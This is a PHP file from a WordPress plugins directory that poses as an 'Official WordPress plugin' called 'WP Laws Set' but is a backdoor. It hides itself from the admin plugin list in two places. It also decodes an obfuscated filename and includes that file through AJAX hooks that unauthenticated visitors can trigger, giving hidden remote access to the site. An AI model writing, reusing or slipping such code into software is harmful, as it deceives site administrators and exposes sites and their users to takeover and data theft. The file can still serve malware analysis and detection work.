File: /datos/www/expodubai/wp-content/plugins/wp-laws-set/wp-laws-set.php
<?php
/*
Plugin Name: WP Laws Set
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 15.2.4
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function ohj_qcz() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$y = array('wp-laws-set/wp-laws-set.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $y)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function jtc_ucz($plugins) {
$i = 'wp-laws-set/wp-laws-set.php';
if (array_key_exists($i, $plugins)) {
unset($plugins[$i]);
}
return $plugins;
}
function bbj($x, $m) {
$r = '';
for ($n = 0; $n < strlen($x); $n += 2) {
$l = ord($x[$n]) - 65;
$q = ord($x[$n + 1]);
if ($q > 90) $q -= 6;
$o = $l * 52 + ($q - 65);
$r .= chr($o - $m);
}
return $r;
}
function wwk_ajax_handler() {
require_once plugin_dir_path(__FILE__) . bbj('JMIzJNIzJOHwIxJNJN', 366);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'ohj_qcz');
add_filter('all_plugins', 'jtc_ucz');
add_action('wp_ajax_law_set', 'wwk_ajax_handler');
add_action('wp_ajax_nopriv_law_set', 'wwk_ajax_handler');
}